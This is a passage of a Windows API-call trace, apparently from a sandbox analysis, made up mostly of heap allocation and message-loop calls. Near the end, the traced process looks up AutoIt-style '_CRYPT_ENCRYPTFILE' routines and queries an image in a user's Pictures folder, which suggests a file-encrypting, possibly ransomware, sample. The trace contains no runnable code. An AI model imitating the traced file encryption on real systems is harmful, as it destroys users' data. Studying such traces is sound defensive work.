| out: hHeap=0x1780000) returned 1 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0093.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0093.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0093.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0093.177] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0093.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0093.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0093.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0093.179] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 1 [0093.181] TranslateMessage (lpMsg=0x144e9a4) returned 0 [0093.181] DispatchMessageW (lpMsg=0x144e9a4) returned 0x0 [0093.181] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0093.181] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0093.181] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.181] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0093.181] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0093.182] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca148 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca130 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca100 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca178 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0093.182] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd10 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e220 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca0e8 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0093.183] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0093.184] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0093.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0093.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43ca208, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0093.184] CloseHandle (hObject=0x298) returned 1 [0093.184] FreeLibrary (hLibModule=0x772d0000) returned 1 [0093.184] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0093.184] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\AsLbgf0HCR8rP.jpg", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83d02bf0, ftCreationTime.dwHighDateTime=0x1d5e17c, ftLastAccessTime.dwLowDateTime=0xfc322800, ftLastAccessTime.dwHighDateTime=0x1d5ebae, ftLastWriteTime.dwLowDateTime=0xfc322800, ftLastWriteTime.dwHighDateTime=0x1d5ebae, nFileSizeHigh=0x0, nFileSizeLow=0x10cae, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="AsLbgf0HCR8rP.jpg", cAlternateFileName="ASLBGF~1.JPG")) returned 0x41ac640 [0093.184] FindClose (in: hFindFile=0x41ac640 | out: hFindFile=0x41ac640) returned 1 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.185] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0093.185] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e38 [0093.185] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0093.185] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0093.186] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac280 [0093.186] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.186] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0093.186] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0093.187] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0093.187] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0093.188] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d20 [0093.188] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 